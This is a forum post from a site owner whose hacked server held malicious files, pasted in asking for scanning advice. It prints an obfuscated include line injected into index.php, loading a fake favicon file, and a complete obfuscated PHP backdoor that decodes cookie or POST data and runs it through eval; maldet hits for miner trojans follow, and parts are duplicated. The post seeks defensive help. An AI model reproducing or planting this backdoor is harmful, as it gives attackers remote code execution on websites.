Server hacked: I found these, please advice how to deep scan and detect any vulnerabilities
Posted: Thu Apr 19, 2018 9:55 am
1. This is in a index.php file:
<?php
/*3bd6f*/
@include "\x2fhom\x65/kw\x73/we\x62/ka\x7aira\x6egaw\x69ldl\x69fes\x6fcie\x74y.i\x6e/pu\x62lic\x5fhtm\x6c/mo\x64ule\x73/bl\x6fg/f\x61vic\x6fn_2\x64393\x34.ic\x6f";
/*3bd6f*/
================
2. another PHP file uploaded by hacker:
<?php
$mslckg = '*#_g6r\'2om8s5k7nlfud4H-3pxeiyctvab0';$zmkcjwn = Array();$zmkcjwn[] = $mslckg[7].$mslckg[17].$mslckg[4].$mslckg[33].$mslckg[29].$mslckg[19].$mslckg[23].$mslckg[7].$mslckg[22].$mslckg[29].$mslckg[20].$mslckg[12].$mslckg[10].$mslckg[22].$mslckg[20].$mslckg[29].$mslckg[33].$mslckg[4].$mslckg[22].$mslckg[32].$mslckg[10].$mslckg[34].$mslckg[34].$mslckg[22].$mslckg[33].$mslckg[19].$mslckg[34].$mslckg[20].$mslckg[29].$mslckg[20].$mslckg[19].$mslckg[12].$mslckg[19].$mslckg[14].$mslckg[4].$mslckg[34];$zmkcjwn[] = $mslckg[21].$mslckg[0];$zmkcjwn[] = $mslckg[1];$zmkcjwn[] = $mslckg[29].$mslckg[8].$mslckg[18].$mslckg[15].$mslckg[30];$zmkcjwn[] = $mslckg[11].$mslckg[30].$mslckg[5].$mslckg[2].$mslckg[5].$mslckg[26].$mslckg[24].$mslckg[26].$mslckg[32].$mslckg[30];$zmkcjwn[] = $mslckg[26].$mslckg[25].$mslckg[24].$mslckg[16].$mslckg[8].$mslckg[19].$mslckg[26];$zmkcjwn[] = $mslckg[11].$mslckg[18].$mslckg[33].$mslckg[11].$mslckg[30].$mslckg[5];$zmkcjwn[] = $mslckg[32].$mslckg[5].$mslckg[5].$mslckg[32].$mslckg[28].$mslckg[2].$mslckg[9].$mslckg[26].$mslckg[5].$mslckg[3].$mslckg[26];$zmkcjwn[] = $mslckg[11].$mslckg[30].$mslckg[5].$mslckg[16].$mslckg[26].$mslckg[15];$zmkcjwn[] = $mslckg[24].$mslckg[32].$mslckg[29].$mslckg[13];foreach ($zmkcjwn[7]($_COOKIE, $_POST) as $cqkektp => $pkste){function qvfslq($zmkcjwn, $cqkektp, $rzuhf){return $zmkcjwn[6]($zmkcjwn[4]($cqkektp . $zmkcjwn[0], ($rzuhf / $zmkcjwn[8]($cqkektp)) + 1), 0, $rzuhf);}function vmgpz($zmkcjwn, $hzjjhan){return @$zmkcjwn[9]($zmkcjwn[1], $hzjjhan);}function kgusa($zmkcjwn, $hzjjhan){$ykasv = $zmkcjwn[3]($hzjjhan) % 3;if (!$ykasv) {eval($hzjjhan[1]($hzjjhan[2]));exit();}}$pkste = vmgpz($zmkcjwn, $pkste);kgusa($zmkcjwn, $zmkcjwn[5]($zmkcjwn[2], $pkste ^ qvfslq($zmkcjwn, $cqkektp, $zmkcjwn[8]($pkste))));}
===
3. this one lookied like tried to temper the etc/passwd file
# owner:group:mode:size(b):md5:atime(epoch):mtime(epoch):ctime(epoch):file(path)
southasiavi:southasiavi:644:58506:0de8a2d08fc4d676878ab80bcf29efb4:1511262032:1524020672:1524020672:/home/**/web/***.com/public_html/modules/field/theme/favicon_90a817.ico
FILE HIT LIST:
{HEX}php.base64.v23au.186 : /home/southasiavi/web/southasiaviews.com/public_html/modules/field/theme/favicon_90a817.ico => /usr/local/maldetect/quarantine/favicon_90a817.ico.273699283
===
4. FILE HIT LIST:
{CAV}Multios.Trojan.CryptocoinMiner-6448864-1 : /tmp/php5 => /usr/local/maldetect/quarantine/php5.11317678
{CAV}Multios.Trojan.CryptocoinMiner-6448864-1 : /tmp/systemd => /usr/local/maldetect/quarantine/systemd.1709516610
{CAV}Multios.Trojan.CryptocoinMiner-6448864-1 : /dev/shm/x => /usr/local/maldetect/quarantine/x.2515229452
===
<?php
/*3bd6f*/
@include "\x2fhom\x65/kw\x73/we\x62/ka\x7aira\x6egaw\x69ldl\x69fes\x6fcie\x74y.i\x6e/pu\x62lic\x5fhtm\x6c/mo\x64ule\x73/bl\x6fg/f\x61vic\x6fn_2\x64393\x34.ic\x6f";
/*3bd6f*/
================
2. another PHP file uploaded by hacker:
<?php
$mslckg = '*#_g6r\'2om8s5k7nlfud4H-3pxeiyctvab0';$zmkcjwn = Array();$zmkcjwn[] = $mslckg[7].$mslckg[17].$mslckg[4].$mslckg[33].$mslckg[29].$mslckg[19].$mslckg[23].$mslckg[7].$mslckg[22].$mslckg[29].$mslckg[20].$mslckg[12].$mslckg[10].$mslckg[22].$mslckg[20].$mslckg[29].$mslckg[33].$mslckg[4].$mslckg[22].$mslckg[32].$mslckg[10].$mslckg[34].$mslckg[34].$mslckg[22].$mslckg[33].$mslckg[19].$mslckg[34].$mslckg[20].$mslckg[29].$mslckg[20].$mslckg[19].$mslckg[12].$mslckg[19].$mslckg[14].$mslckg[4].$mslckg[34];$zmkcjwn[] = $mslckg[21].$mslckg[0];$zmkcjwn[] = $mslckg[1];$zmkcjwn[] = $mslckg[29].$mslckg[8].$mslckg[18].$mslckg[15].$mslckg[30];$zmkcjwn[] = $mslckg[11].$mslckg[30].$mslckg[5].$mslckg[2].$mslckg[5].$mslckg[26].$mslckg[24].$mslckg[26].$mslckg[32].$mslckg[30];$zmkcjwn[] = $mslckg[26].$mslckg[25].$mslckg[24].$mslckg[16].$mslckg[8].$mslckg[19].$mslckg[26];$zmkcjwn[] = $mslckg[11].$mslckg[18].$mslckg[33].$mslckg[11].$mslckg[30].$mslckg[5];$zmkcjwn[] = $mslckg[32].$mslckg[5].$mslckg[5].$mslckg[32].$mslckg[28].$mslckg[2].$mslckg[9].$mslckg[26].$mslckg[5].$mslckg[3].$mslckg[26];$zmkcjwn[] = $mslckg[11].$mslckg[30].$mslckg[5].$mslckg[16].$mslckg[26].$mslckg[15];$zmkcjwn[] = $mslckg[24].$mslckg[32].$mslckg[29].$mslckg[13];foreach ($zmkcjwn[7]($_COOKIE, $_POST) as $cqkektp => $pkste){function qvfslq($zmkcjwn, $cqkektp, $rzuhf){return $zmkcjwn[6]($zmkcjwn[4]($cqkektp . $zmkcjwn[0], ($rzuhf / $zmkcjwn[8]($cqkektp)) + 1), 0, $rzuhf);}function vmgpz($zmkcjwn, $hzjjhan){return @$zmkcjwn[9]($zmkcjwn[1], $hzjjhan);}function kgusa($zmkcjwn, $hzjjhan){$ykasv = $zmkcjwn[3]($hzjjhan) % 3;if (!$ykasv) {eval($hzjjhan[1]($hzjjhan[2]));exit();}}$pkste = vmgpz($zmkcjwn, $pkste);kgusa($zmkcjwn, $zmkcjwn[5]($zmkcjwn[2], $pkste ^ qvfslq($zmkcjwn, $cqkektp, $zmkcjwn[8]($pkste))));}
===
3. this one lookied like tried to temper the etc/passwd file
# owner:group:mode:size(b):md5:atime(epoch):mtime(epoch):ctime(epoch):file(path)
southasiavi:southasiavi:644:58506:0de8a2d08fc4d676878ab80bcf29efb4:1511262032:1524020672:1524020672:/home/**/web/***.com/public_html/modules/field/theme/favicon_90a817.ico
FILE HIT LIST:
{HEX}php.base64.v23au.186 : /home/southasiavi/web/southasiaviews.com/public_html/modules/field/theme/favicon_90a817.ico => /usr/local/maldetect/quarantine/favicon_90a817.ico.273699283
===
4. FILE HIT LIST:
{CAV}Multios.Trojan.CryptocoinMiner-6448864-1 : /tmp/php5 => /usr/local/maldetect/quarantine/php5.11317678
{CAV}Multios.Trojan.CryptocoinMiner-6448864-1 : /tmp/systemd => /usr/local/maldetect/quarantine/systemd.1709516610
{CAV}Multios.Trojan.CryptocoinMiner-6448864-1 : /dev/shm/x => /usr/local/maldetect/quarantine/x.2515229452
===